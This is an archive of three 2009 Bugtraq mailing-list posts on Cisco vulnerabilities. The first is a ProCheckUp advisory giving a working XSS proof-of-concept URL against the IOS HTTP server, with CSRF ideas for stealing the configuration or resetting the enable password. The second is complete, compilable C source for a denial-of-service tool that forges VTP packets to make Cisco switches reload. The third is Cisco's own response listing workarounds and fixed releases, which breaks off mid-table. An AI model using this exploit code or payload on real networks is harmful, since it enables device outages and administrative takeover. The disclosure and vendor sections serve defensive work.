Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 8B783EC14F
for <lists@securityspace.com>; Wed, 14 Jan 2009 12:54:40 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 03052143A4D; Wed, 14 Jan 2009 09:33:17 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 31162 invoked from network); 14 Jan 2009 11:12:38 -0000
Message-ID: <496DCE62.7070502@procheckup.com>
Date: Wed, 14 Jan 2009 11:37:06 +0000
From: ProCheckUp Research <research@procheckup.com>
User-Agent: Thunderbird 2.0.0.19 (X11/20081209)
MIME-Version: 1.0
To: <bugtraq@securityfocus.com>
Subject: PR08-19: XSS on Cisco IOS HTTP Server
Content-Type: text/plain; charset="ISO-8859-1"
Content-Transfer-Encoding: 7bit
Status:   

PR08-19: XSS on Cisco IOS HTTP Server

Date found: 1st August 2008

Vendor contacted: 1st August 2008

Advisory publicly released: 14th January 2009

Severity: Medium

Credits: Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)

Description:

Cisco IOS HTTP server is vulnerable to XSS within invalid parameters
processed by the "/ping" server-side binary/script.


Consequences:

An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to the HTTP server of a
Cisco device.

This type of attack can result in non-persistent defacement of the
target admin interface, or the redirection of confidential information
to unauthorised third parties. i.e.: by scraping the data returned by
the '/level/15/exec/-/show/run/CR' URL via the XMLHttpRequest object.

It might also be possible to perform administrative changes by
submitting forged commands (CSRF) within the payload of the XSS attack.
i.e.: injecting an 'img' tag which points to
'/level/15/configure/-/enable/secret/newpass' would change the enable
password to 'newpass'.


Notes:

1. The victim administrator needs to be currently authenticated for this
vulnerability to be exploitable

2. In order to exploit this vulnerability successfully, the attacker
only needs to know the IP address of the Cisco device. There is NO need
to have access to the IOS HTTP server

Proof of concept (PoC):

http://192.168.100.1/ping?<script>alert("Running+code+within+the_context+of+"%2bdocument.domain)</script>


Content of HTML body returned:

<BODY BGCOLOR=#FFFFFF><H2>test-router</H2><HR><DT>Error: URL syntax:
?<script>alert("Running code within the_context of
"+document.domain)</script></BODY>

Successfully tested on:

Cisco 1803
Cisco IOS Software, C180X Software (C180X-ADVIPSERVICESK9-M), Version
12.4(6)T7, RELEASE SOFTWARE (fc5)


Assigned Cisco Bug ID#:

CSCsr72301

CVE reference:

CVE-2008-3821


References:

http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr08-19
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml

Fix:

Please see Cisco advisory for information on available updates.


Legal:

Copyright 2009 ProCheckUp Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if the Bulletin is not changed or edited in any way, is attributed
to ProCheckUp indicating this web page URL, and provided such
reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. ProCheckUp is not
liable for any misuse of this information by any third party. ProCheckUp
is not responsible for the content of external Internet sites.

From - Wed Jan 14 13:12:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058da
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39164-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id BE426EC144
for <lists@securityspace.com>; Wed, 14 Jan 2009 13:07:37 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 62B7E2373B7; Wed, 14 Jan 2009 09:17:17 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24724 invoked from network); 14 Jan 2009 04:43:20 -0000
Date: 14 Jan 2009 05:07:03 -0000
Message-ID: <20090114050703.20375.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: showrun.lee@gmail.com
To: bugtraq@securityfocus.com
Subject: DoS code for Cisco VLAN Trunking Protocol Vulnerability
Status:   

/*DoS code for Cisco VLAN Trunking Protocol Vulnerability
 *
 *vulerability discription:
 *http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml
 *
 *To Known:
 * 1.the switch must in Server/Client Mode.
 * 2.the port ,attacker connected,must be in trunk Mode.
 *   Cisco Ethernet ports with no configuration are not
 *   in trunk.but trunk mode can be obtained through DTP
 *   attack by Yersinia.
 * 3.you must known the vtp domain,this can be sniffed
 * 4.some codes are from Yersinia.
 *
 *Result:
 * switch reload.
 *
 *
 *Compile:
 * gcc -o vtp `libnet-config --libs` vtp.c
 *
 *Usage:vtp -i <interface> -d <vtp_domain>
 *
 *Contact: showrun.lee[AT]gmail.com
 *http://sh0wrun.blogspot.com/
 */
#include <libnet.h>
#include <stdio.h>
#include <stdlib.h>

#define VTP_DOMAIN_SIZE    32
#define VTP_TIMESTAMP_SIZE 12

struct vtp_summary {
     u_int8_t  version;
     u_int8_t  code;
     u_int8_t  followers;
     u_int8_t  dom_len;
     u_int8_t  domain[VTP_DOMAIN_SIZE];
     u_int32_t revision;
     u_int32_t updater;
     u_int8_t  timestamp[VTP_TIMESTAMP_SIZE];
     u_int8_t  md5[16];
};

struct vtp_subset {
     u_int8_t  version;
     u_int8_t  code;
     u_int8_t  seq;
     u_int8_t  dom_len;
     u_int8_t  domain[VTP_DOMAIN_SIZE];
     u_int32_t revision;
};

void usage( char *s) {
    printf("%s -i <interface> -d <vtp domain>\n",s);
    exit (1);
}

int main( int argc, char *argv[] )
{
    int opt,k=0;
    extern char *optarg;
    libnet_ptag_t t;
    libnet_t *lhandler;
    u_int32_t vtp_len=0, sent;
    struct vtp_summary *vtp_summ;
    struct vtp_subset *vtp_sub;
    u_int8_t *vtp_packet,*vtp_packet2, *aux;
    u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
    u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };
    u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 };
    struct libnet_ether_addr *mymac;
    char *device;
    char error_information[LIBNET_ERRBUF_SIZE];
    char *domain;

// get options
     while ((opt = getopt(argc, argv, "i:d:")) != -1)
     {
          switch (opt) {
          case 'i':
          device=malloc(strlen(optarg));
          strcpy(device,optarg);
      k=1;
          break;

          case 'd':
          domain=malloc(strlen(optarg));
          strcpy(domain,optarg);
          break;
         
          default: usage(argv[0]);
          }
     }
     if(!k) { printf("  %s -i <interface> -d <vtp domain>\n     must assign the interface\n",argv[0]);exit(1);}

//init libnet

    lhandler=libnet_init(LIBNET_LINK,device,error_information);
    if (!lhandler) {
             fprintf(stderr, "libnet_init: %s\n", error_information);
             return -1;
     }

    mymac=libnet_get_hwaddr(lhandler);
//build the first packet for vtp_summary
    vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
    vtp_packet = calloc(1,vtp_len);
    aux = vtp_packet;
    memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
    aux+=sizeof(cisco_data);
    vtp_summ = (struct vtp_summary *)aux;
    vtp_summ->version = 0x01;
    vtp_summ->code = 0x01;//vtp_summary
    vtp_summ->followers = 0x01;
    vtp_summ->dom_len = strlen(domain);
    memcpy(vtp_summ->domain,domain,strlen(domain));
    vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok
    t = libnet_build_802_2(
        0xaa,            /* DSAP */
        0xaa,            /* SSAP */
        0x03,            /* control */
        vtp_packet,      /* payload */
        vtp_len,         /* payload size */
        lhandler,        /* libnet handle */
        0);              /* libnet id */
    t = libnet_build_802_3(
        dst_mac,       /* ethernet destination */
        mymac->ether_addr_octet,     /* ethernet source */
        LIBNET_802_2_H + vtp_len, /* frame size */
        NULL,                     /* payload */
        0,                        /* payload size */
        lhandler,                 /* libnet handle */
        0);                       /* libnet id */

     sent = libnet_write(lhandler);

     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
     }
     libnet_clear_packet(lhandler);
    
//build the second vtp packet for vtp_subset
     vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);
     vtp_packet2 = calloc(1,vtp_len);
     aux = vtp_packet2;
     memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));
     aux+=sizeof(cisco_data);
    
     vtp_sub = (struct vtp_subset *)aux;
     vtp_sub->version = 0x01;
     vtp_sub->code = 0x02; //vtp_subset
     vtp_sub->seq = 0x01;
     vtp_sub->dom_len = strlen(domain);
     memcpy(vtp_sub->domain,domain,strlen(domain));
     vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok
//     memcpy(vtp_sub->aaa,aaa,strlen(aaa));
    
    t = libnet_build_802_2(
        0xaa,            /* DSAP */
        0xaa,            /* SSAP */
        0x03,            /* control */
        vtp_packet2,      /* payload */
        vtp_len,         /* payload size */
        lhandler,        /* libnet handle */
        0);              /* libnet id */
    t = libnet_build_802_3(
        dst_mac,       /* ethernet destination */
        mymac->ether_addr_octet,     /* ethernet source */
        LIBNET_802_2_H + vtp_len, /* frame size */
        NULL,                     /* payload */
        0,                        /* payload size */
        lhandler,                 /* libnet handle */
        0);                       /* libnet id */

     sent = libnet_write(lhandler);
     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
     }
     libnet_clear_packet(lhandler);
}

From - Wed Jan 14 13:22:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058db
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39174-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id F2899EC0EC
for <lists@securityspace.com>; Wed, 14 Jan 2009 13:19:33 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 2A462143AF4; Wed, 14 Jan 2009 09:34:05 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3026 invoked from network); 14 Jan 2009 15:56:11 -0000
X-TACSUNS: Virus Scanned
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Response: Cisco IOS Cross-Site Scripting Vulnerabilities
Date: Wed, 14 Jan 2009 17:00:00 +0100
Message-id: <200901141700.http@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
MIME-Version: 1.0
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report: 
Content-Return: Prohibited
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Response: Cisco IOS Cross-Site Scripting
Vulnerabilities

http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml

Revision 1.0

For Public Release 2009 January 14 1600 UTC (GMT)

- ---------------------------------------------------------------------

Cisco Response
=============
Two separate Cisco IOS  Hypertext Transfer Protocol (HTTP) cross-site
scripting (XSS) vulnerabilities have been reported to Cisco by two
independent researchers. ProCheckup has posted a Security Advisory
titled "XSS on Cisco IOS HTTP Server" posted at 
http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr08-19

Cisco would like to thank Adrian Pastor and Richard J. Brain of
ProCheckUp and Nobuhiro Tsuji of NTT Data Security Corporation with
co-operation of JPCert.

This Cisco Security Response is posted at the following link: 
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml

Additional Information
=====================
This response covers two separate cross-site scripting
vulnerabilities within the Cisco IOS Hypertext Transfer Protocol
(HTTP) server (including HTTP secure server - here after referred to
as purely HTTP Server) and applies to all Cisco products that run
Cisco IOS Software versions 11.0 through 12.4 with the HTTP server
enabled. A system that contains the IOS HTTP server or HTTP secure
server, but does not have it enabled, is not affected.

To determine if the HTTP server is running on your device, issue the
show ip http server status | include status and the show ip http
server secure status | include status commands at the prompt and look
for output similar to:

    Router#show ip http server status | include status
    HTTP server status: Enabled
    HTTP secure server status: Enabled

If the device is not running the HTTP server, you should see output
similar to:

    Router#show ip http server status | include status
    HTTP server status: Disabled
    HTTP secure server status: Disabled

These vulnerabilities are documented in the following Cisco bug IDs:

  * Cisco bug ID CSCsi13344 - XSS in IOS HTTP Server 
    Special Characters are not escaped in URL strings sent to the
    HTTP server.
  * Cisco bug ID CSCsr72301 - XSS in IOS HTTP Server (ping parameter)
    Special Characters are not escaped in URL strings sent to the
    HTTP server, via the ping parameter. The ping parameter is used
    both by external applications such as Router and Security Device
    Manager (SDM) as well as a direct HTTP session to Cisco IOS http
    server. This vulnerability affects 12.1E based trains and all
    Cisco IOS releases after 12.2(13)T.

These vulnerabilities are independent of each other. For a full
solution, download a Cisco IOS version that contains the fixes for
both Cisco bug IDs. These vulnerabilities have been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2008-3821.

Workaround
+---------

If the HTTP server is not used for any legitimate purposes on the
device, it is a best practice to disable it by issuing the following
commands in configure mode:

    no ip http server
    no ip http secure-server

If the HTTP server is required, it is a recommended best practice to
control which hosts may access the HTTP server to only trusted
sources. To control which hosts can access the HTTP server, you can
apply an access list to the HTTP server. To apply an access list to
the HTTP server, use the following command in global configuration
mode:

    ip http access-class {access-list-number | access-list-name}

The following example shows an access list that allows only trusted
hosts to access the Cisco IOS HTTP server:

    ip access-list standard 20
    permit 192.168.1.0 0.0.0.255
    remark "Above is a trusted subnet"
    remark "Add further trusted subnets or hosts below"

    ! (Note: all other access implicitly denied)
    ! (Apply the access-list to the http server)

    ip http access-class 20

For additional information on configuring the Cisco IOS HTTP server,
consult Using the Cisco Web Browser User Interface.

For additional information on cross-site scripting attacks and the
methods used to exploit these vulnerabilities, please refer to the
Cisco Applied Mitigation Bulletin "Understanding Cross-Site Scripting
(XSS) Threat Vectors", which is available at the following link:
http://www.cisco.com/warp/public/707/cisco-amb-20060922-understanding-xss.shtml

Further Problem Description
+--------------------------

This vulnerability is about escaping characters in the URL that are
sent to the HTTP server. This vulnerability is different from the
vulnerability reported in Cisco bug ID CSCsc64976. The fix for this
vulnerability is to escape special characters in the URL string 
echoed in the response generated by the web exec application.

Software Version and Fixes
+-------------------------

When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center ("TAC") or your contracted
maintenance provider for assistance.

Each row of the Cisco IOS software table (below) describes a release
train and the platforms or products for which it is intended. If a
given release train is vulnerable, then the earliest possible
releases that contain the fix (the "First Fixed Release") and the
anticipated date of availability for each are listed in the "Rebuild"
and "Maintenance" columns. A device running a release in the given
train that is earlier than the release in a specific column (less
than the First Fixed Release) is known to be vulnerable. The release
should be upgraded at least to the indicated release or a later
version (greater than or equal to the First Fixed Release label).

For more information on the terms "Rebuild" and "Maintenance,"
consult the following URL: 
http://www.cisco.com/warp/public/620/1.html

+----------------------------------------+
|   Major    | Availability of Repaired  |
|  Release   |         Releases          |
|------------+---------------------------|
|  Affected  | First Fixed | Recommended |
| 12.0-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0       | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0DA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0DB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0DC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | 12.0(33)S3; |             |
| 12.0S      | Available   |             |
|            | on          |             |
|            | 03-APR-2009 |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SC     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SL     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0SP     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0ST     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SX     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SY     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SZ     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0T      | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.0(3c)W5  |
| 12.0W      | first fixed | (8)         |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0WC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.0WT     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XD     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XE     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.0XF     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XG     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XH     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Releases    |             |
|            | prior to    |             |
|            | 12.0(4)XI2  |             |
|            | are         |             |
|            | vulnerable, |             |
| 12.0XI     | release     | 12.4(15)    |
|            | 12.0(4)XI2  | T812.4(23)  |
|            | and later   |             |
|            | are not     |             |
|            | vulnerable; |             |
|            | first fixed |             |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XJ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XK     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XL     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XM     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XN     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XQ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XR     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XS     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XT     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XV     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|  Affected  | First Fixed | Recommended |
| 12.1-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1       | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1AA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1AX     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1AY     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1AZ     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1CX     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1DA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1DB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1DC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.1E      | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1EA     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
| 12.1EB     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(33)    |
| 12.1EC     | first fixed | SCA212.2    |
|            | in 12.3BC   | (33)SCB12.3 |
|            |             | (23)BC6     |
|------------+-------------+-------------|
| 12.1EO     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(31)    |
| 12.1EU     | first fixed | SGA912.2    |
|            | in 12.2SG   | (50)SG      |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(20)    |
| 12.1EV     | first fixed | S1212.2(33) |
|            | in 12.4     | SB312.4(15) |
|            |             | T812.4(23)  |
|------------+-------------+-------------|
|            |             | 12.2(31)    |
|            | Vulnerable; | SGA912.2    |
| 12.1EW     | first fixed | (50)SG12.4  |
|            | in 12.4     | (15)T812.4  |
|            |             | (23)        |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1EX     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.1EY     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1EZ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1GA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1GB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1T      | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XD     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XE     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XF     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XG     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XH     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XI     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XJ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XL     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XM     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XP     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XQ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XR     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XS     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XT     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XU     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XV     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XW     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XX     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XY     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XZ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YD     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Releases    |             |
|            | prior to    |             |
|            | 12.1(5)YE6  |             |
|            | are         |             |
|            | vulnerable, |             |
| 12.1YE     | release     | 12.4(15)    |
|            | 12.1(5)YE6  | T812.4(23)  |
|            | and later   |             |
|            | are not     |             |
|            | vulnerable; |             |
|            | first fixed |             |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YF     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YH     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.1YI     | Vulnerable; |             |
|            | contact TAC |             |
